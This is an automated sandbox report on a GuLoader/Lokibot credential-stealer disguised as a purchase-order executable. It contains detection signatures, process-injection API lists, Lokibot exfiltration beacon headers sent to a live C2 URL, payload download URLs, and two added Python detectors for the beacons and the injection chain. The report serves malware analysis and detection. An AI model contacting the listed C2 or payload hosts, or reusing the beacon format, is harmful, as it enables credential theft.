
Analysis Report PO-A2174679-06.exe

Overview

General Information

Sample Name: PO-A2174679-06.exe
Analysis ID: 356484
MD5: fdec289fb4626dd56bbb55770ae5f432
SHA1: 1a1f324185e6114fb1362b00f27fe8009a202361
SHA256: eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
Tags: exe

Most interesting Screenshot:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • PO-A2174679-06.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
    • PO-A2174679-06.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Memory Dumps

Source | Rule | Description | Author
0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
Process Memory Space: PO-A2174679-06.exe PID: 5424 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: PO-A2174679-06.exe | Virustotal: Detection: 16%

Compliance:

Uses 32bit PE files
Source: PO-A2174679-06.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS. Every alert is on a flow from 192.168.2.5 to 192.185.78.145:80; the source ports of the flows that triggered each rule are listed below.
  • 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1: source ports 49732, 49733
  • 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2: source ports 49732, 49733
  • 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1: source ports 49734-49741, 49743-49753, 49755, 49759, 49761, 49763, 49765-49780
  • 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2: source ports 49734-49741, 49743-49753, 49755, 49759, 49761, 49763, 49765-49780
  • 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno): every flow above (source ports 49732-49741, 49743-49753, 49755, 49759, 49761, 49763, 49765-49780)
  • 2025381 ET TROJAN LokiBot Checkin: every flow above (source ports 49732-49741, 49743-49753, 49755, 49759, 49761, 49763, 49765-49780)
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected: 27 POST requests with the following headers (the first two with Content-Length: 192, the remaining 25 identical except for Content-Length: 165):

    POST /ovation/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: accessasia.com.hk
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EB0DDEC
    Content-Length: 192
    Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: unknown  DNS traffic detected: queries for: onedrive.live.com
              Source: unknown  HTTP traffic detected:
                  POST /ovation/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: accessasia.com.hk
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 5EB0DDEC
                  Content-Length: 192
                  Connection: close
              Source: global traffic  HTTP traffic detected:
                  HTTP/1.1 404 Not Found
                  Date: Tue, 23 Feb 2021 07:49:25 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Content-Length: 15
                  Content-Type: text/html
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
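              The POST beacons above carry the header set the report attributes to Lokibot: an HTTP/1.0 POST, the fixed User-Agent "Mozilla/4.08 (Charon; Inferno)", an application/octet-stream body with Content-Encoding: binary, and the non-standard Content-Key header. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it parses raw HTTP requests and flags the ones that match that combination, returning host, path and Content-Key for pivoting. The two requests embedded in it are constructed (one mirrors the report's headers, one is an ordinary browser POST that must not fire), and the rule that at least two indicators must agree is this example's own choice.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Fixed User-Agent string the report shows on every beacon.
LOKI_UA = "Mozilla/4.08 (Charon; Inferno)"

# Constructed sample traffic (not taken from the sandbox capture).
SAMPLE_REQUESTS = [
    (
        "POST /ovation/five/fre.php HTTP/1.0\r\n"
        "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
        "Host: accessasia.com.hk\r\n"
        "Accept: */*\r\n"
        "Content-Type: application/octet-stream\r\n"
        "Content-Encoding: binary\r\n"
        "Content-Key: 5EB0DDEC\r\n"
        "Content-Length: 165\r\n"
        "Connection: close\r\n"
        "\r\n"
    ),
    (
        "POST /api/upload HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
        "Host: example.test\r\n"
        "Content-Type: application/json\r\n"
        "Content-Length: 2\r\n"
        "\r\n"
        "{}"
    ),
]


@dataclass
class Request:
    method: str
    path: str
    version: str
    headers: Dict[str, str]  # header names lower-cased, values stripped


@dataclass
class Verdict:
    host: str
    path: str
    content_key: Optional[str]
    reasons: List[str] = field(default_factory=list)


def parse_request(raw: str) -> Request:
    """Split a raw HTTP request into request line and a header dict."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, version, headers)


def classify(raw: str) -> Optional[Verdict]:
    """Return a Verdict when at least two Lokibot beacon indicators agree."""
    req = parse_request(raw)
    h = req.headers
    reasons: List[str] = []
    if h.get("user-agent") == LOKI_UA:
        reasons.append("user-agent")
    if "content-key" in h:
        reasons.append("content-key header")
    if (req.method == "POST" and req.version == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        reasons.append("octet-stream POST over HTTP/1.0 with binary encoding")
    if len(reasons) < 2:  # a lone indicator is too weak to alert on
        return None
    return Verdict(h.get("host", ""), req.path, h.get("content-key"), reasons)


def scan(requests: List[str] = SAMPLE_REQUESTS) -> List[Verdict]:
    """Run the classifier over a list of raw requests and keep the hits."""
    return [v for v in (classify(r) for r in requests) if v is not None]


if __name__ == "__main__":
    for v in scan():
        print(f"{v.host}{v.path} Content-Key={v.content_key} reasons={v.reasons}")
```

              Requiring two agreeing indicators keeps a single odd header from alerting on its own, while the Content-Key value is retained because it is the most specific string in the beacon for pivoting across captures.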
              Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp  String found in binary or memory: http://accessasia.com.hk/ovation/five/fre.php
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp  String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp  String found in binary or memory: http://ocsp.digicert.com0:
              Source: PO-A2174679-06.exe, 0000000B.00000003.460675918.0000000000AAE000.00000004.00000001.sdmp  String found in binary or memory: http://ocsp.msocsp.com0
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp  String found in binary or memory: http://sinatrasmob.com/pro/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp  String found in binary or memory: https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp  String found in binary or memory: https://hrf0ga.bn.files.1drv.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp  String found in binary or memory: https://hrf0ga.bn.files.1drv.com/y4m5zM3NcSoKRZxp1cr4njUjeP9hX2vmu4HSL4nnw0taslILmJBULwQ1DfMXTHzg-Rs
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp  String found in binary or memory: https://onedrive.live.com/
              Source: PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp  String found in binary or memory: https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp  String found in binary or memory: https://onedrive.live.com/n
              Source: PO-A2174679-06.exe, 00000000.00000002.346109535.000000000073A000.00000004.00000020.sdmp  Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Process Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC0699 EnumWindows,NtSetInformationThread, 0_2_02BC0699
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk, 0_2_02BC4291
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC81F3 NtResumeThread, 0_2_02BC81F3
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC7B36 NtProtectVirtualMemory, 0_2_02BC7B36
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC570F NtSetInformationThread, 0_2_02BC570F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC0977 NtWriteVirtualMemory,TerminateProcess,LdrInitializeThunk,LoadLibraryA, 0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC6F5E NtWriteVirtualMemory, 0_2_02BC6F5E
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC1AB6 NtSetInformationThread, 0_2_02BC1AB6
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC829E NtResumeThread, 0_2_02BC829E
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC72EF NtWriteVirtualMemory, 0_2_02BC72EF
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC84C5 NtResumeThread, 0_2_02BC84C5
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC083A NtSetInformationThread, 0_2_02BC083A
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC1A7F NtSetInformationThread, 0_2_02BC1A7F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC446A NtSetInformationThread,NtWriteVirtualMemory, 0_2_02BC446A
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC8664 NtWriteVirtualMemory, 0_2_02BC8664
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC2DFD NtWriteVirtualMemory, 0_2_02BC2DFD
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC6D2D NtSetInformationThread, 0_2_02BC6D2D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3105 NtWriteVirtualMemory, 0_2_02BC3105
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC6F06 NtWriteVirtualMemory, 0_2_02BC6F06
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC4307 NtSetInformationThread,NtWriteVirtualMemory,LdrInitializeThunk, 0_2_02BC4307
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC077C NtSetInformationThread, 0_2_02BC077C
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC2F6F NtWriteVirtualMemory, 0_2_02BC2F6F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC8554 NtResumeThread, 0_2_02BC8554
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC8150 NtResumeThread, 0_2_02BC8150
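              The native calls listed above (NtWriteVirtualMemory, NtProtectVirtualMemory, NtResumeThread and repeated NtSetInformationThread), taken together with the suspended child process and the "hides threads from debuggers" signatures in this report, are the footprint of a loader that writes its payload into a freshly spawned copy of itself and shields its own threads from a debugger. The Python below is an added example, not from the Joe Sandbox report and not the sample's code: it checks a per-process API-call trace for the ordered injection chain and for NtSetInformationThread with the ThreadHideFromDebugger information class (0x11). The trace it runs on is constructed; the PIDs are borrowed from the report's process list, but every argument value in it (creation flags, target PID, protection constant) is assumed for illustration rather than observed in this analysis.

```python
from dataclasses import dataclass
from typing import Dict, List

THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS ThreadHideFromDebugger
CREATE_SUSPENDED = 0x00000004      # dwCreationFlags bit for a suspended child


@dataclass
class ApiCall:
    pid: int
    api: str
    args: dict


# Constructed trace (not the sandbox's own log). PID 5424 mimics the loader
# stage described in the report; PID 4242 is a benign process for contrast.
SAMPLE_TRACE = [
    ApiCall(5424, "NtSetInformationThread", {"ThreadInformationClass": 0x11}),
    ApiCall(5424, "CreateProcessW", {"lpApplicationName": r"C:\Users\user\Desktop\PO-A2174679-06.exe",
                                     "dwCreationFlags": CREATE_SUSPENDED}),
    ApiCall(5424, "NtWriteVirtualMemory", {"TargetPid": 6600}),
    ApiCall(5424, "NtProtectVirtualMemory", {"TargetPid": 6600, "NewProtect": 0x40}),
    ApiCall(5424, "NtResumeThread", {"TargetPid": 6600}),
    ApiCall(4242, "CreateProcessW", {"lpApplicationName": r"C:\Windows\notepad.exe",
                                     "dwCreationFlags": 0x0}),
    ApiCall(4242, "ReadFile", {}),
]

# The chain must occur in this order within one process (other calls may sit between).
INJECTION_CHAIN = ["CreateProcess:suspended", "NtWriteVirtualMemory", "NtResumeThread"]


def normalize(call: ApiCall) -> str:
    """Fold CreateProcess variants into one token that records the suspended flag."""
    if call.api.startswith("CreateProcess"):
        flags = call.args.get("dwCreationFlags", 0)
        return "CreateProcess:suspended" if flags & CREATE_SUSPENDED else "CreateProcess"
    return call.api


def has_ordered_subsequence(seq: List[str], pattern: List[str]) -> bool:
    """True when every element of pattern appears in seq, in order, not necessarily adjacent."""
    i = 0
    for item in seq:
        if i < len(pattern) and item == pattern[i]:
            i += 1
    return i == len(pattern)


def analyze(trace: List[ApiCall] = SAMPLE_TRACE) -> Dict[int, List[str]]:
    """Group calls by PID and return the findings raised for each process."""
    by_pid: Dict[int, List[ApiCall]] = {}
    for c in trace:
        by_pid.setdefault(c.pid, []).append(c)

    findings: Dict[int, List[str]] = {}
    for pid, calls in by_pid.items():
        hits: List[str] = []
        names = [normalize(c) for c in calls]
        if has_ordered_subsequence(names, INJECTION_CHAIN):
            hits.append("suspended-process injection chain")
        if any(c.api == "NtSetInformationThread"
               and c.args.get("ThreadInformationClass") == THREAD_HIDE_FROM_DEBUGGER
               for c in calls):
            hits.append("thread hidden from debugger")
        if "NtWriteVirtualMemory" in names and "NtProtectVirtualMemory" in names:
            hits.append("remote memory written and reprotected")
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in analyze().items():
        print(pid, hits)
```

              Matching an ordered subsequence rather than exact adjacency is deliberate: loaders of this kind interleave the injection calls with anti-analysis checks, so a rule that demands the three calls back to back would miss exactly the traces it is meant to catch.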
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC0977 0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 11_3_00AB2165 11_3_00AB2165 (reported 25 times across the process 11 memory dumps)
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 11_3_00AB084D 11_3_00AB084D (reported 25 times across the process 11 memory dumps)
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 11_3_00AB794D 11_3_00AB794D (reported 25 times across the process 11 memory dumps)
              Source: PO-A2174679-06.exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: PO-A2174679-06.exe, 00000000.00000002.346228693.00000000021F0000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenameuser32j% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 00000000.00000000.231740123.0000000000414000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502209088.0000000002440000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenamemswsock.dll.muij% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000000.344741544.0000000000414000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe, 0000000B.00000002.502225382.0000000002490000.00000002.00000001.sdmp  Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe  Binary or memory string: OriginalFilenameyappingextr.exe vs PO-A2174679-06.exe
              Source: PO-A2174679-06.exe  Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@3/2@43/1
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  File created: C:\Users\user\AppData\Local\Temp\~DF584B63FBA4AD36AE.TMP
              Source: PO-A2174679-06.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  File read: C:\Windows\System32\drivers\etc\hosts (reported 6 times)
              Source: PO-A2174679-06.exe  Virustotal: Detection: 16%
              Source: unknown  Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe' (reported twice)
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

              Data Obfuscation:

              Yara detected GuLoader
              Source: Yara match  File source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara match  File source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Yara detected VB6 Downloader Generic
              Source: Yara match  File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Source: Yara match  File source: Process Memory Space: PO-A2174679-06.exe PID: 6600, type: MEMORY
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_0040DAC0 push dword ptr [ebp-14h]; ret 0_2_0041096D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_00404856 push edi; retf 0_2_00404857
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_00406411 push edx; ret 0_2_00406412
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_004030D6 pushfd ; retf 0_2_004030DD
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_00403096 pushfd ; retf 0_2_0040309D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3C9F pushad ; retf 0_2_02BC3CA2
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3AE6 pushad ; retf 0_2_02BC3AE9
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3AC2 pushad ; retf 0_2_02BC3AC3
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3C38 pushad ; retf 0_2_02BC3C3B
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3C14 pushad ; retf 0_2_02BC3C15
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC5015 pushfd ; retf 0_2_02BC5016
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3A02 pushad ; retf 0_2_02BC3A05
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3C7B pushad ; retf 0_2_02BC3C7C
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3A76 pushad ; retf 0_2_02BC3A79
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3A52 pushad ; retf 0_2_02BC3A53
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3B9F pushad ; retf 0_2_02BC3BA0
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC39DE pushad ; retf 0_2_02BC39DF
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3BC3 pushad ; retf 0_2_02BC3BC6
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3B2B pushad ; retf 0_2_02BC3B2D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 0_2_02BC3B50 pushad ; retf 0_2_02BC3B53
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe  Code function: 11_3_00AB818D push ss; ret 11_3_00AB8192 (reported 11 times across the process 11 memory dumps)
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
